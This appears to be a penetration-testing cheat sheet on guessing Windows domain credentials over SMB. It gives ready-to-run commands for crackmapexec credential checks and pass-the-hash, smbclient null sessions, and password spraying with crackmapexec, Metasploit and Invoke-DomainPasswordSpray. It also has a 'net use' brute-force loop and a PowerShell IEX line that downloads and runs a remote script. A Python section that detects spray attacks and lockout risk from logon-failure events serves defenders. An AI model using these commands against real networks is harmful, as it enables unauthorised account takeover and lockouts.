SMB
Use the SMB service to guess Windows-related credentials. This is especially useful in an Active Directory environment, where domain accounts authenticate over SMB.
Check Credentials
crackmapexec
crackmapexec [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]
Result | Description
---|---
[+] PWNED | Valid credentials and local administrator
[+] green | Valid credentials
[-] red | Invalid credentials (or other error)
Tip
Use -H [NTHASH] instead of -p [PASSWORD] to authenticate using the pass-the-hash technique.
smbclient
smbclient //<HOST>/<SHARE> -U <USERNAME>[%PASSWORD] -W [DOMAIN]
You should get an smb: \> prompt if the credentials work. To authenticate with a null session, do not specify a username and leave the password blank, or add the -N flag so that no password is sent.
Tip
Use --pw-nt-hash and provide the NT hash instead of the password to authenticate using the pass-the-hash technique.
Note
Find available shares using share enumeration techniques.
Password Spray
Always be careful about account lockout when performing password spray attacks in an Active Directory environment. See users enumeration techniques to get the list of all AD users and their failed password attempt count.
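The lockout concern above has a mirror image on the monitoring side: a spray produces one source address failing against many distinct accounts in a short window, and each wrong-password failure moves an account closer to the domain's lockout threshold within its observation window. The following is an added example, not code from the original page, that shows both checks over a small constructed sample modelled on Windows Security event 4625 (logon failure) fields. The CSV layout, the sample values, the function names and the default threshold of 5 failures in a 30-minute observation window are assumptions chosen for illustration; the NTSTATUS codes are the standard ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real log data. Each line models the fields of a
# Windows Security event 4625 (logon failure):
# time, event id, target account, source address, logon type, NTSTATUS
SAMPLE_EVENTS = """\
2024-05-01T10:00:01,4625,alice,10.0.0.50,3,0xC000006A
2024-05-01T10:00:02,4625,bob,10.0.0.50,3,0xC000006A
2024-05-01T10:00:03,4625,carol,10.0.0.50,3,0xC000006A
2024-05-01T10:00:04,4625,dave,10.0.0.50,3,0xC000006A
2024-05-01T10:00:05,4625,erin,10.0.0.50,3,0xC000006A
2024-05-01T10:00:06,4625,svc_backup,10.0.0.50,3,0xC0000064
2024-05-01T10:05:10,4625,carol,10.0.0.7,3,0xC000006A
2024-05-01T10:06:12,4625,carol,10.0.0.7,3,0xC000006A
2024-05-01T10:07:15,4625,carol,10.0.0.7,3,0xC000006A
2024-05-01T10:08:20,4625,carol,10.0.0.7,3,0xC000006A
2024-05-01T10:09:30,4625,carol,10.0.0.7,3,0xC000006A
2024-05-01T11:00:00,4625,dave,10.0.0.9,3,0xC000006A
"""

# Standard NTSTATUS values seen in the "Sub Status" field of event 4625.
WRONG_PASSWORD = "0xC000006A"  # STATUS_WRONG_PASSWORD
NO_SUCH_USER = "0xC0000064"    # STATUS_NO_SUCH_USER
LOCKED_OUT = "0xC0000234"      # STATUS_ACCOUNT_LOCKED_OUT


def parse_events(text):
    """Parse the constructed CSV lines into dicts, keeping only 4625 events, sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, source, logon_type, status = line.split(",")
        if event_id != "4625":
            continue
        events.append({
            "time": datetime.fromisoformat(ts),
            "user": user.lower(),
            "source": source,
            "logon_type": int(logon_type),
            "status": status,
        })
    return sorted(events, key=lambda e: e["time"])


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source: peak distinct accounts failing within one window} for sources at or above min_users.

    A spray is one source trying many accounts; a user mistyping a password is one
    account from one source, so the distinct-account count separates the two.
    Failures for non-existent accounts are counted too: a stale user list is a
    common spray artefact.
    """
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source"]].append(e)
    alerts = {}
    for source, evs in by_source.items():
        peak = 0
        for i, start in enumerate(evs):  # evs is time-ordered, so a forward scan suffices
            users = {e["user"] for e in evs[i:] if e["time"] - start["time"] <= window}
            peak = max(peak, len(users))
        if peak >= min_users:
            alerts[source] = peak
    return alerts


def accounts_at_lockout_risk(events, threshold=5, observation_window=timedelta(minutes=30)):
    """Return {account: peak wrong-password failures within one observation window} for accounts that reach the threshold.

    Only STATUS_WRONG_PASSWORD counts, matching how badPwdCount is incremented;
    threshold and observation_window stand in for the domain's lockout policy.
    """
    by_user = defaultdict(list)
    for e in events:
        if e["status"] == WRONG_PASSWORD:
            by_user[e["user"]].append(e["time"])
    at_risk = {}
    for user, times in by_user.items():
        peak = 0
        for i, start in enumerate(times):
            peak = max(peak, sum(1 for t in times[i:] if t - start <= observation_window))
        if peak >= threshold:
            at_risk[user] = peak
    return at_risk


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("spray sources:", detect_spray(evs))
    print("accounts at lockout risk:", accounts_at_lockout_risk(evs))
```

In the sample, 10.0.0.50 fails against six accounts within seconds and is reported as a spray source, while 10.0.0.7 fails only against carol and is not. carol nevertheless reaches six wrong-password failures inside one observation window (one from the spray plus five from 10.0.0.7), which is exactly the cumulative effect that makes spraying during an existing brute force lock accounts out.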
crackmapexec
for user in $(cat users.txt); do crackmapexec [HOST] -u $user -p [PASSWORD] -d [DOMAIN]; done
All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.
Info
The database file of cmedb is located at ~/.cme/cme.db.
Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS [HOST]
set USER_FILE [USERS.txt]
set SMBDomain [DOMAIN]
set SMBPass [PASSWORD]
run
All valid users will be automatically saved to the workspace creds database.
PowerShell - DomainPasswordSpray.ps1
Automates the whole user enumeration and password spray process when run from within the domain.
Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]
When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.
Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]
Of course, the users list and domain name can also be specified manually.
Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]
Note
IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')
Reference: https://github.com/dafthack/DomainPasswordSpray
Brute Force
Native Windows - net use
for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause
Alternatively, we could append each working password to a file:
for /F %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]